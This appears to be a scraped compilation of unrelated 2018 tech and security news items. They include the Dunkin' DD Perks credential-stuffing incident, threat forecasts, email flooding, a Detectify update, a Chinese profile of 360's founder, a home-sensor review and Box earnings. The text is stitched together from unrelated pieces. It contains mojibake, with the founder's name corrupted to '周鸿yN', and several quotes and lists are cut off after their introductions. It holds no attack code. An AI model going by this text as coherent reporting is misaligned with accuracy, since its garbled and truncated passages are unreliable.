Dunkin’ Brands Inc. in an advisory posted to its website said that on Oct. 31, a malicious actor attempted to access customers’ first and last names, email address, as well as account information forDD Perks, Dunkin Donuts’ rewards program. That account info includecustomers’ 16-digit DD Perks account number and DD Perks QR code.Dunkin’ Donuts has forced a password reset that required all of the potentially impacted DD Perks account holders to log out and log back in to their account using a new password.

The company said that it believes the hacker obtained usernames and passwords from security breaches of other companies, and then used those usernames and passwords to try to break in to various online accountsvia widespread automated login requests amethod also known as credential stuffing.

“Although Dunkin’ did not experience a data security breach involving its internal systems, we’ve been informed that third-parties obtained usernames and passwords through other companies’ security breaches and used this information to log into some Dunkin’ DD Perks accounts,” the company said in its statement.

Dunkin’ Donuts said its security vendor was successful in stopping most of these attempts, but it is possible still that the hacker may have succeeded in logging in to some DD Perks accounts.

Credential stuffing is affordable and seamless, making it attractive for hackers to carry out in fact, NuData Security, a Mastercard Company, has found that 90 percent of cyberattacks start with some sort of automation with credential stuffing being a prominent one, like the one perpetrated on Dunkin’ Donuts.

“The software for credential stuffing is now so affordable that this type of attack is becoming accessible for almost anyone,” Ryan Wilk, VP of customer success for NuData Security, said in an email.

The incident points to the need for basic security password hygiene specifically the need for users to utilize different passwords for different accounts.

Wilk said that merely forcing customers to change their passwords is not entirely effective.

“Having customers change their passwords is a temporary fix, a band-aid that doesn’t get to the root of the problem,” he said. “One effective way to stop this type of attack is to implement security solutions that detect this sophisticated automated activity at login and other placements. By using technologies that include behavioral biometrics, automated activity is flagged at login before it can even test any credentials in the company’s environment.”

The incident is the second notable data breach of a company this week. On Wednesday, Dell EMCwarned customers of unauthorized activity on its network that occurred on Nov. 9 when it believes adversaries attempted to access names, email addresses and hashed passwords.

In 2018 the threat landscape evolved at a breakneck pace, from predominantly DDoS and ransom attacks (in 2016 and 2017, respectively), to automated attacks. We saw sensational attacks on APIs, the ability to leverage weaponized Artificial Intelligence, and growth in side-channel and proxy-based attacks.

And by the looks of it, 2019 will be an extension of the proverbial game of whack-a-mole, with categorical alterations to the current tactics, techniques and procedures (TTPs). While nobody knows exactly what the future holds, strong indicators today enable us to forecast trends in the coming year.

The worldwide public cloud services market is projected to grow 17.3 percent in 2019 to total $206.2 billion, up from $175.8 billion in 2018, according to Gartner, Inc. This means organizations are rapidly shifting content to the cloud, and with that data shift comes new vulnerabilities and threats. While cloud adoption is touted as faster, better, and easier, security is often overlooked for performance and overall cost. Organizations trust and expect their cloud providers to adequately secure information for them, but perception is not always a reality when it comes to current cloud security, and 2019 will demonstrate this.

Ransom, includingransomware andransom RDoS, will give way to hijacking new embedded technologies, along with holding healthcare systems and smart cities hostage with the launch of 5G networks and devices. What does this look like? The prospects are distressing:

As trade and other types of “soft-based’ power conflicts increase in number and severity, nation states and other groups will seek new ways of causing widespread disruption including Internet outages at the local or regional level, service outages, supply chain attacks and application blacklisting by government in attempted power grabs. Contractors and government organizations are likely to be targeted, and other industries will stand to lose millions of dollars as indirect victims if communications systems fail and trade grinds to a halt.

Over the past several years, we’ve witnessed the development and deployment of massive IoT-based botnets, such as Mirai , Brickerbot , Reaper and Haijme, whose systems are built around thousands of compromised IoT devices. Most of these weaponized botnets have been used in cyberattacks to knock out critical devices or services in a relatively straightforward manner.

Recently there has been a change in devices targeted by bot herders. Based on developments we are seeing in the wild, attackers are not only infiltrating resource-constrained IoT devices, they are also targeting powerful cloud-based servers. When targeted, only a handful of compromised instances are needed to create a serious threat. Since IoT malware is cross-compiled for many platforms, including x86_64, we expect to see attackers consistently altering and updating Mirai/Qbot scanners to include more cloud-based exploits going into 2019.

If the growth of the attack landscape continues to evolve into 2019 through various chaining attacks and alteration of the current TTP’s to include automated features, the best years of cybersecurity may be behind us. Let’s hope that 2019 will be the year we collectively begin to really share intelligence and aid one another in knowledge transfer; it’s critical in order to address the threat equation and come up with reasonable and achievable solutions that will abate the ominous signs before us all.

Until then, pay special attention to weaponized AI, large API attacks, proxy attacks and automated social engineering. As they target the hidden attack surface of automation, they will no doubt become very problematic moving forward.

Read the “2018 C-Suite Perspectives: Trends in the Cyberattack Landscape, Security Threats and Business Impacts” to learn more.

Download Now

For continuous coverage, we push out major Detectify security updates every two weeks, keeping our tool up-to-date with new findings, features and improvements sourced from our security researchers and Crowdsource ethical hacker community. Due to confidentially agreements, we cannot publicize all security update releases here but they are immediately added to our scanner and available to all users. This post highlights a few things that we have improved in the last two weeks.

The following are some of the security vulnerabilities reported by Detectify Crowdsource ethical hackers. We added these tests to the Detectify scanner tool on 29 November.

Yet another WordPress plugin that publish the whole backup available for anyone to download. This continues to be a problem and shows the importance of disabling Directory Listening.

jQuery-File-Upload continue to be mentioned in Security Update after Security Update, and we still get Crowdsource submissions on different ways it can be used to exploit a system. We are looking forward to a more elaborated write-up in the future.

It is commonly known that Mac OS saves a file in each directory called .DS_Store that contain a list of all files in that directory. However, as you do not per default actually see that file when using Mac OS itself, it is common that people accidentally upload this file to websites when they are uploading a whole folder.

Less known, although far from a secret, is that windows actually have something similar called Thumbs.db. The file works in the same way and stores a thumbnail of all images in a directory. It happens in the same way that people accidentally upload this file. Read more here: https://github.com/thinkski/vinetto

This release our own security researchers spent some time fiddling around with Struts and implementing a lot of existing vulnerabilities, and ensuring all the tests works as they should.

Begin a scan for the latest vulnerabilities today. Start a free trial with Detectify here !

Already have an account? Login to check your assets .

Detectify is a continuous web scanner monitor service that can be set up for automated scanning for 1000+ known vulnerabilities including the OWASP Top 10. Check for the latest vulnerabilities!

I am all for tougher privacy laws, especially for companies that have not followed basic security practices for securing data. There is a proposal from US Senator Ron Wyden that would increase penalties and give more rights to consumers. Consumers could opt out of data sharing and executives could be fined or jailed. The penalties are stiff, and I think it’s not likely to pass, and more practically, many of the penalties might not actually get enforced.

In the US we don’t have much in the way of rights over our own data as humans. Companies, for the most part, have complete control over the data they collect about us and can re-use, sell, share, etc. that data in any way they wish. There are some laws concerning notifications of data loss, and some penalties in California’s recent law, but for most of the country, consumers are at the mercy of organizations. I’d like that to change, and I don’t think doing so would hurt most businesses. Aggregators and data only companies might struggle, but I’d like to see less of those companies in business.

Stronger penalties might stimulate change and better practices, but only if we fine or jail those that limit security efforts. Most technical people try to implement security but are often prevented or limited from making many changes when there is pressure to keep moving forward. Certainly some technical people don’t take security seriously, but I’d like to see employees absolved of responsibility if they show that they have asked for time or resources for security, but those aren’t granted. I’d also like to see some way for management at all levels to prove they have actually requested and funded security efforts, not just remain ignorant of the lack of security. Too many layers of management muddy the waters and often prevent those that are responsible for pushing other work over security from being held accountable. We need more accountability at all levels for poor security.

Likely there is a limited amount of structure that government can provide. Developers and infrastructure groups need to build and configure secure systems. Some funding needs to be available for security work, along with the time to do better. Management needs to make security a priority It’s a group effort and while I hope we can get there, I’m not terribly confident things will improve soon.

Steve Jones

Listen to the MP3 Audio ( 3.4MB) podcast or subscribe to the feed at iTunes and Libsyn .

An old attack technique is making its way back into the mainstream with an onslaught of messages that legacy tools and script writing can't easily detect.

Imagine your inbox receiving 15,000 messages over the course of just a few days. What would certainly be an extreme nuisance could also translate into a huge productivity and operations liability, taking days or even weeks to return your primary method of communications back to normal.

Known as email flooding, this easy-to-implement technique is re-emerging among attackers for two primary reasons: to deliver the messages and demands of hacktivists, and as a diversionary tactic to help perpetrate financial or operational fraud.

A Tsunami of Emails

Also known as subscription bombing or email bombing, email flooding dates back to the late-1990s, when attackers automated programs to scan the web for sign-up forms and insert the emails of those being targeted into numerous subscription forms. The targeted emails would subsequently be sent to thousands of emails in a short period of time, often disabling the account.

Such attacks have been used in the past for harassment or for political purposes. One of the first noted instances was in 1996, when a stockbroker in San Francisco was bombarded with a flood of 25,000 emails that prevented him from using his computer.

Symantec argues that such attacks are almost impossible to prevent because they come from legitimate email accounts, and most major mail servers don't even pick them up in spam filters. The attacks can also be carried out automatically with simple scripts at registration forms that aren't protected by CAPTCHA or opt-in email. Today, sophisticated landing pages are built to continuously send automated messages to any valid email address.

A Smokescreen for Fraudulent Transactions

Email bombs are also still used as a means of harassment. In August 2017, an email bomb shut down ProPublica's email for a day, and secure email provider Tutanota was recently hit with a massive bomb that sent 500,000 newsletters to one of its mailboxes. At best, these attacks are a nuisance. But at their worst, they can cripple networks, shutter operations, and lead to a loss of productivity and revenue.

In addition to hacktivism, email flooding is now being used as a smokescreen for more dangerous phishing techniques such as business email compromise, spearphishing and malware. Criminals use the email flood to distract victims and to exhaust security resources while they perpetrate fraudulent transactions. By the time the targeted person or organization clears the clutter and discovers the legitimate emails notifying them of account changes or suspicious activity, the attackers have made off with the funds.

The end-of-year global security report by AppRiver noted that cybercriminals are increasingly using this so-called "distributed spam distraction" (or DSD) to disguise fraud in real time. The attacks include email subscriptions and text-only messages that bombard the account for a period of 12 to 24 hours, then abruptly end after the real crime has been completed. Email bombs are not only effective but cheap and simple to orchestrate. Services on the Dark Web now enable anyone to bomb an email account with 5,000 messages for as little as $20.

The Underlying Need: A Comprehensive Email Strategy

With all types of phishing attacks increasing in frequency and sophistication, many organizations are hardening their email security posture at both the server and the mailbox. This is especially important to stop email flooding, as traditional email safeguards such as secure email gateways and phishing awareness training are not built to mitigate this technique.

Currently, organizations trying to remediate an email flooding attack are asking IT to create scripts and tools to counter the influx of emails that come in bulk or intermittently. While correct in theory, this approach is time consuming and there is no guarantee that it will work. A paper at the Anti-Phishing Working Group noted that one of the most effective measures against email flooding is a layered approach toward detection and throttling through volume and time-based methodologies with phrasal pattern recognition. Authors of the paper said a combination of user email behavior profiling and anomaly detection can better help identify the start of a bombing attack.

This early detection can enable users to maintain functionality of the inbox by limiting new messages and allowing expected messages to come through. In many cases, it may buy just enough time to enable the user or the security operations center team to prevent a wire transfer.

Hactivists and fraudsters may have very different motivations for launching email flooding attacks, but the outcomes for those on the receiving end are all damaging to finances, reputation, and operations, or a combination thereof. As this old technique makes its way back into the mainstream, those in charge of email security must adopt layered defenses that can detect and respond to an onslaught of messages with the efficiency that legacy tools and script writing cannot.

Black Hat Europe returns to London Dec. 3-6, 2018, with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Eyal Benishti has spent more than a decade in the information security industry, with a focus on software R&D for startups and enterprises. Before establishing IRONSCALES, he served as security researcher and malware analyst at Radware, where he filed two patents in the ...View Full Bio

Dunkin' Donuts said a security vendor detected a so-called credential stuffing attack last month. (Flickr/ Thomas Hawk )

Written byJeff Stone

Nov 29, 2018 | CYBERSCOOP

Dunkin’ Donuts has alerted customers to a data breach that may impact those who signed up to DD Perks, the company’s loyalty program.

The fast-casual restaurant chain learned Oct. 31 that thieves obtained username and password information belonging to Dunkin’ customers via a credential stuffing incident. Those attacks occur when cybercriminals take credential information leaked in other data breaches then plug that data into other sites, targeting users who re-use the same password on multiple sites.

“Our security vendor was successful in stopping most of these attempts, but it is possible that these third-parties may have succeeded in logging in to your DD Perks account if you used your DD Perks username and password for accounts unrelated to Dunkin’,” the company said in a statement.

Compromised information included customers’ first and last names, email addresses, their 16-digit DD Perks account number and the DD Perks QR code. Dunkin’ did not disclose the number of customers who may be affected.

Hackers often trade points for corporate loyalty programs on the dark web, selling airline miles, gift cards and other perks for cryptocurrency. Credential stuffing increasingly is becoming thieves’ preferred method for acquiring that stolen data: Some companies contend with an average of 3.75 billion malicious login attempts every month, according to recent findings from the security vendor Akamai.

-In this Story- credential stuffing , cybercrime , Dunkin' Donuts , passwords , restaurants

Digital security provider Gemalto is claiming an industry-first with the launch of a new solution that it says will enable organisations which have invested in Public Key Infrastructure (PKI) security applications to leverage their investment without compromise on security or user experience when moving to the cloud.

Gemalto says its new solution will enable employees and organisations to benefit from SSO and high assurance PKI-based authentication, making it easier and more secure to access cloud and web-based apps and resources from wherever and on any device.

And, additionally, Gemalto says the solution will help users access PKI applications from new environments, including mobile devices and virtualised desktops environments, and use PKI credentials for security applications including digital signing and email encryption.

Through SafeNet Trusted Access, Gemalto says security-sensitive organisations whose employees log into enterprise resources with smart cards can use those same credentials to access cloud and web-based apps and benefit from single sign on (SSO).

According to Gemalto, up until now, PKI hardware’s limitations meant companies could not adopt cloud and mobility projects without having to completely ‘rip and replace’ their current security framework.

“As a result, companies have been using smart cards and tokens to allow their employees to authenticate themselves while accessing corporate resources, but this was limited to activity within the enterprise perimeter. In addition, companies that use PKI credentials for email encryption and digital signing have also been limited to on-premises environments,” Gemalto says.

“As much as cloud computing is recognised for its many benefits, the reality for most firms is that they will be operating in a hybrid environment for years to come,” said Garrett Bekker, Principal Security Analyst at 451 Research.

“By enabling firms to extend their existing PKI investments to cloud and web-based resources, SafeNet Trusted Access can help firms build on their existing security frameworks to accelerate their digital and cloud transformation.”

Gemalto is offering different ways to build on current PKI investments, so companies embrace digital transformation without compromising on security, including:

“With the rapid development and adoption of cloud services, many organisations are struggling to balance their digital transformation projects with the need to keep themselves secure,” said Francois Lasnier, senior vice president of Identity and Access Management at Gemalto.

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts’ payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored, in this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

1994年4月20日，中国通过一条64K的国际专线，全功能接入国际互联网，距离改革开放的开始已经过去了16年。民营经济在这16年间获得了长足的发展，旧制度逐步松动，新共识开始形成。

1992年，邓小平发表南巡讲话，经济发展的重要性被强调，意识形态之争被搁置。

第一代互联网创业者正是在这样的潮流中，投身创业。周鸿yN的正式加入要晚一点，但创业对他而言，已是家常便饭。早在西安交通大学读书期间，周鸿yN就有多段创业经历，失败之后在1995年进入方正集团担任程序员。1998年，周鸿yN离开方正，创办了3721，后者旨在提供网络实名中文上网业务。

在改革开放第一个二十年里确立的基本共识，为互联网创业者提供了良好的制度和社会氛围。在开放的大背景下，海外VC在中国的淘金为这批创业者们带来了经济支持。

当周鸿yN怀着对硅谷的向往，开始3721的“车库式创业”时，拿着写在两张纸上的“简陋”商业计划书，获得了IDG资本200万人民币的投资。IDG资本正是改革开放后最早进入中国的VC之一。

周鸿yN有着这一批创业者的典型特征，高学历、计算机背景、做过程序员、优秀的产品经理。这批创业者往往身兼产品经理和企业管理者两个角色。

周鸿yN本人正是3721的主要开发者之一，时至今日，360的产品经理聊起他，还会说“老周先是个产品经理，然后才是个企业家”。企业家的重要性通过周鸿yN们得到进一步强化，企业家成为改革共同体最重要的组成之一。

借着改革开放的东风，互联网第一代创业者们成功走上创业道路，他们身处科学技术最能彰显力量的行业之一。他们的事业，也成为改革共同体的一部分。

没有中文上网服务之前，用户需要记住复杂的英文域名，无形中提升了使用壁垒。互联网进入中国，作为改革开放的成果之一，理应惠及更多人。3721提供中文上网服务，会让更多人享受到改革开放的红利，从而加入到改革共同体中。

改革共同体的扩大与夯实，需要创新，这恰恰也是周鸿yN在共同体中发挥的作用。2006年，周鸿yN出任奇虎360董事长，两年后，360推出了免费杀毒软件。

在杀毒软件普遍收费的时代，360走出了一种新的商业模式，通过免费的杀毒服务满足用户的安全需求后，再借助浏览器搭建上网平台，并提供增值服务盈利。

2009年，360实现盈利。金山毒霸和瑞星公司先后跟进，中国杀毒软件市场进入免费时代。

互联网行业在中国刚起步时，许多公司将国外已经成熟的产品模式快速复制到国内，取得了一些成功，但是，从改革的长远目标，以及改革共同体的国际形象来看，创新才是解决问题的关键。

2018年，周鸿yN带领从纳斯达克私有化退市的360重返A股市场。他在采访中表示，360未来会是国家网络安全中的一支重要力量，以A股上市公司的身份做这件事更合适。360重返A股之后，市值一度达到4000亿元的高点。

今年，马云、李彦宏等企业家均表示，如果有机会，希望回归A股。中国企业走出去再走回来，也意味着改革共同体正在努力增加制度的包容性和适应性，拥抱创新型企业和新经济公司。而360的回归，就是改革共同体逐步优化的实例之一。

UK consumers increasingly put their money where their trust is, research from PCI Pal finds

With the busy Christmas shopping period now upon us, new research conducted on behalf of payment security specialists PCI Pal has found that 44% of UK consumers will stop spending with a business or brand for several months in the immediate aftermath of a security breach or a hack.

Even more significantly, a further 41% of consumers will never return to a brand or a business post-breach, representing a significant loss of revenue, offering a stark warning to consumer-facing businesses.

The findings from the research commissioned by the payment security specialist suggest that the combination of high-profile recent breaches, headlines devoted to new data privacy regulations such as the GDPR, and personal experience have put security concerns at the forefront for UK consumers. Over a third (38%) confirmed they have personally suffered the negative consequences of a data security breach.

Meanwhile, consumers reported that even being perceived as having insecure data practices can be enough to incur spending penalties: 31% reported that they spend less with brands they perceive to have insecure data practices, while over a quarter (26%) say they stop spending completely if they don’t trust a company with their data.

“While security breaches are not new, consumers’ attitudes towards them appear to be changing significantly, with the vast majority of those surveyed now reporting that trust in security practices, or lack thereof, influences not just where but also how, and how much they are prepared to spend,” explained James Barham, CEO at PCI Pal.

The findings suggest that it’s not just online threats that worry consumers with 76% uncomfortable with providing payment information, such as credit card details, over the phone. Specifically, almost a third (32%) said they would hang up and find an alternative payment option, while nearly a quarter (24%) would ask for an online payment option and a further fifth (20%) would enquire as to how the data is being captured and whether it is safe.

Interestingly, when looking at the research findings by age group, 41% of those aged 18-24 said they would give their payment security information over the phone with no questions asked, compared to just 14% of those aged 55-65.

Barham continues: “What’s really interesting is how consumers are increasingly questioning data security practices. Nearly half of those surveyed know they should check a company’s security processes and 22% said they question businesses directly or research how an organisation safeguards consumer data. This suggests a real change in how consumers prioritise privacy and security. This should act as a real wake-up call to consumer-facing brands: they need to adopt stronger security practices, especially for those operating contact centres where payments are handled over the phone if they want to keep customers loyal and spending with them.”

Finally, from an industry perspective, consumers were asked which verticals they consider to be the least secure or more likely prone to a security breach, 41% of consumers said the financial sector, followed by 40% suggesting retail and 35% suggesting the travel industry.

To download a copy of the ‘This Is The UK’ eBook, which includes additional findings from the survey, visit: https://www.pcipal.com/knowledge-centre/guides/uk-state-of-security-eyes-of-consumers/ .

Please click here to download release for distribution

The post Security breaches come with a high price tag for UK businesses appeared first on PCI Pal .

Motion sensors are an essential component of any home security system. But in Kangaroo’s current ecosystem, motion sensors are the only component.

On the upside, that means you don’t need a central hub, because the sensors connect directly to your Wi-Fi network. What’s more, a single motion sensor can cover an entire room, saving you from the expense of installing door/window sensors on every door and window leading into the room. On the downside, you won’t be notified of intruders in your home until they’re already in your home. And you get no protection at all when you’re at home.

You’ll need to install an app on your smartphone (Android and iOS are supported) to receive messages from the sensors, and you can invite third parties―such as a neighbor―to help you monitor your home by typing their mobile phone numbers into the app. Kangaroo will send them an invitation, and they will also need to install the app (you should of course ask them if they’re willing to do this for you ahead of time).

You’ll arm and disarm the sensors from the app’s home screen. You’ll also see notifications here.

Under the free self-monitoring plan, Kangaroo will send push notifications to the app on your phone and to whoever has accepted your invitation to help. A paid subscription―$9 per month or $60 per year―unlocks a host of additional features, including professional monitoring service (more on that in a bit).

Professionally monitored security systems generally qualify you for a discount on your homeowners’ insurance, and Kangaroo says it will help you obtain that from your insurance provider. The last benefit included with the subscription plan is Amazon Alexa integration (Google Assistant and IFTTT integration are in the works).

Kangaroo’s motion sensors are relatively compact devices (3.55 x 1.55 x 0.7 inches) that operate on two AA batteries (included). They come with two-way adhesive pads on the back for peel-and-stick installation. I’ve never encountered an adhesive that lasted for very long, and the motion sensor I installed in my garage fell off after just a month of summer heat (Kangaroo rates them for indoor use only, but I don’t consider the garage to be outdoors).

That said, the unit I installed inside the house remained mounted until I took it down at the end of my review. Kangaroo helpfully provides two wood screws for a more secure installation, but there’s only one predrilled hole on the detachable back that faces the wall. I would recommend drilling one above that to prevent the top-heavy sensor from pivoting down.

Actually, Kangaroo suggests mounting its motion detectors vertically, with the sensor at the bottom . But if you have pets, it recommends mounting them with the sensor at the top to avoid false alarms (the company says the motion detector will ignore moving objects up to 2-feet, 4-inches high). The sensor itself detects motion up to 15 feet away, with a 120-degree field of view.

During installation, you name each sensor according to the room it’s installed in, and you provide your street address and phone number via the app. A supplemental field in the home address section labeled “Notes for authorities” allows you to provide information they might find helpful when they respond to a call. I entered the code for my electric gate in this field. Kangaroo suggests other scenarios, too, such as if there is an elderly or disabled person in the home, or if there’s a key under the welcome mat.

If you miss the text message the subscription service sends when a sensor detects motion, you’ll get a phone call from a live human.

The system is ready to use as soon as you have your sensors installed and registered in the app. To arm the system, swipe right on the app’s home screen. This will initiate a 10-minute countdown to allow you to leave your home without setting off the motion detectors. There is currently no way to eliminate this countdown should you choose to activate the sensors after you’ve already closed the door behind you.

Since Kangaroo doesn’t have any other type of sensors, there’s no “home” and “away” mode. “Away” mode is all you get. You wouldn’t want the motion sensors active while you’re at home, unless they’re installed in rooms you don’t routinely go into (the garage, maybe?). I suppose you could discipline yourself to remember to disarm the sensors when you do go in those rooms, but that’s just not very realistic. As it exists today, this security system can only protect your home while you’re gone.

When a sensor is tripped, you’re notified via push notification to the app on the free plan, where a “call 911” button is displayed. With the subscription plan, you’ll get a push notification and/or a text message. Subscribers also get a robocall. In all cases, you can slide a button to disarm the system if you decide it’s a false alarm. If you’re a subscriber and don’t take any action, a representative will call you to ask if everything is OK. If you don’t respond to that call, the monitoring service will notify the police.

As I mentioned earlier, Alexa integration (and Google Assistant, at some point) is included with a paid subscription, and IFTTT integration is in the works. But that’s as far as Kangaroo goes. You can’t integrate with SmartThings or any of the other product or service, and that includes sirens, door/window sensors, and security cameras. Kangaroo is working on the new products for the first two categories, but not the third.

Sirens can be helpful because they draw attention to your home―something no intruder wants. Personally, I like to have the loudest siren I can get, in the hope the noise will drive the intruder out. The absence of door/window sensors means you might unknowingly leave one or more of them open when you leave, giving an intruder an easy access point.

But the absence of security camera support is this system’s biggest shortcoming: Considering that the police departments in many jurisdictions issue fines for false alarms, how confident will you feel calling 911 based solely on a motion sensor being triggered?

Kangaroo Motion Sensors have a 120-degree field of view and 15-foot range.

You could install third-party security cameras in the rooms where the motion detectors are installed, but you’d need to launch a separate app to access those feeds, hoping to see whatever set off the alarm. But there’s no guarantee the camera’s motion sensor will be tripped by the same event that set off the motion detector. A more robust and better integrated security system will trigger all your security cameras to record, giving you the best chance of seeing what’s going on and what happened.

Cash-strapped homeowners might consider a $30 self-monitored motion sensor to be a good deal, and the subscription fee for professional monitoring is the cheapest I’ve seen. But this system’s biggest limitation is that it offers virtually no security while you’re in your home, and the professional monitoring plans for some complete DIY home security systems don’t cost much more than Kangaroo is charging. A $199 Ring Alarm kit, for example, includes one motion sensor, one door/window sensor, a siren, and more, and it can be integrated with Ring’s video doorbells and indoor/outdoor security cameras. Ring’s optional professional monitoring option costs $10 per month, and that includes cellular radio backup if you lose your broadband connection, plus cloud storage for an unlimited number of Ring cameras.

Kangaroo has several other weaknesses as well. The app doesn’t maintain an event log, so any history of motion detection is erased as soon as you clear your smartphone notifications. And there’s no geofencing feature, so you’ll need to remember to arm the system each time you leave and disarm it every time you return. Bottom line: Kangaroo is a cheap home security system, but it doesn’t offer a whole lot of value.

This story, "Kangaroo Motion Sensor review: This home security system only goes halfway" was originally published by TechHive .

The fourth quarter is a time when many financial institutions are deep into strategic planning for the coming year. Whether you are on the business or security side of the house, it is the time to re-evaluate how to protect and simplify the customer experience with the right security technologies, increase customer loyalty, and reduce exposure to fraud and data breaches.

The risk of cyberattack on financial institutions cannot be overstated. In the past year, there have been more than one billion cyberattacks on financial institutions 1 . That is 300 times more than other industries such as retail, insurance, or healthcare. At an average cost of $18 million 2 for each successful attack, the cost of cybercrime includes:

In fact, financial institutions lost over $16.8 billion to cybercriminals in 2017 3 alone. Account takeover fraud tripled in 2017, which resulted in $5.1 billion in associated losses. 4 According to Ponemon Institute’s consumer sentiment study 5 , data breaches are in the top three incidents that affect brand reputation, along with poor customer service and environmental incidents.

Cybercriminals will continue to get more sophisticated in attacking their prime target: financial institutions. In this blog, we discuss risk-based authentication as an important element of your security strategy and how it enables you to improve customer satisfaction, cut fraud losses, and better meet strict regulations.

Risk-based authentication is a fast and cost-efficient way to improve security. With so many financial transactions moving to digital channels, the potential for increased fraud and attacks is inevitable. And while new regulations guide FIs to better fight fraud by requiring new security technologies, they can also introduce more friction to customer transactions. This is one of the greatest challenges for FIs today. How to drive down fraud and meet compliance requirements, in a way that is easy and convenient for the customer?

The answer is risk-based authentication, also known as adaptive authentication or step-up authentication. Risk-based authentication is the process of applying the precise amount of security, at the right time, into each unique customer transaction based on the level of risk no more, no less. It is the risk score that drives the level of security required (e.g., push notification, fingerprint, facial recognition, etc.).

Risk-based authentication provides a wide range of benefits across your organization, including the winning conditions for growth, reduced fraud, and an optimal customer experience.

Learn about the rising levels of cyberattacks, regulatory compliance trends, the evolution of authentication security and how RBA can benefit your organization.

REGISTER NOW

As fraud increases, so does the need for stronger authentication and security. At the same time, however, the customer’s patience for additional security measures is dwindling. Add too many authentication layers, and users will get frustrated spending too much time trying to access their accounts.

Transacting with financial institutions has to be as easy as it is secure. It should be so easy and frictionless that customers don’t even think about the security. Studies show that consumers generally don’t think about security until it breaks. When that happens, people tend to blame the financial institution. Clearly, security has to be done well in order to create the best possible customer experiences, since this will drive growth through improved customer loyalty, retention, and use of bank services.

Risk-based authentication is key to unlocking growth for banks by improving the customer experience across all channels. This can be done with frictionless authentication, such as biometrics, facilitated by better fraud detection that leverages the combination of advanced machine learning and customized rule sets. As banks add new online services and new ways to serve a more mobile population, risk-based authentication can help keep pace with security and provide the least intrusive experience possible for customers.

There is a clear need to continuously improve your overall security defenses as bad actors grow more adept at fraud and compromising systems. Static passwords are easily hacked and, as a result, they are a key cause of security breaches and account fraud. Part of the problem with passwords is that modern fraud methods are so sophisticated, a simple password has no hope of preventing them. These attacks can make use of a variety of malware tools to penetrate a network, establish themselves across various servers, and use different methods, such as Brutus, RainbowCrack, Wfuzz and others to compromise credentials, disable various protective measures, and hide from detection.

The best way to combat this is to couple risk-based authentication with a risk analytics engine to provide a more flexible layered, risk-based approach to authentication. Good risk-based authentication platforms can examine a wide variety of inputs across all channels and make real-time decisions about the precise level of authentication security required for each unique transaction.

Risk-based authentication assembles a series of risk scores to evaluate each transaction. As the predictive models “learn” more, the risk score becomes more accurate as it accepts various inputs. Over time, it will become a more reliable indicator of account compromise and emerging fraud patterns. Because the level of risk is based on the total contextual view including user behavior, transaction data, and device data, it is very difficult to impersonate.

Banking regulations are constantly changing to help banks stay ahead of hackers. The security compliance requirements can be quite extensive and have sizeable penalties for non-compliance. To comply, your organization must be agile and ever vigilant, continuously refining your compliance strategies and implementing new technologies.

He was alluding to the company’s failure to return a profit, some 13 years since founding, although there’s sight now of break-even coming next year.

That said, the numbers released for Q3 were heading in the right direction, with a 21% year-on-year rise in revenues to $155.9 million and net losses down from $42.9 million to $40.2 million. And there were some strong stats trotted out that deal sizes are on the up as well. For Q3:

It’s also significant that more than 80% of the 6-figure deals are multi-product deals with at least one add-on spend, said Levie:

Particular interest is coming from the governance and platform offerings:

OK, so are the customers that are doing all this? On this point, Levie was disappointingly vague, citing ‘cloaked’ use cases rather than citing specific logos. So:

Looking ahead to 2019, Levie identified a couple of recent developments that he reckons will tick the right boxes for users, starting with Box Skills Kit. Due for general release prior to Christmas, this is pitched as enabling enterprise customers, third-party developers and system integrators to build custom AI integrations of Box:

And security capabilities will continue to be a priority in 2019, said Levie:

As a long term Box-watcher, the journey to profitability has been frustratingly slow, but perhaps the tipping point is finally in sight. This latest set of numbers is solid, rather than spectacular. Box has some terrific use cases out there and it would be good to hear more about/from them than the vague references that were on show. Maybe in 2019?

Image credit - Twitter/Box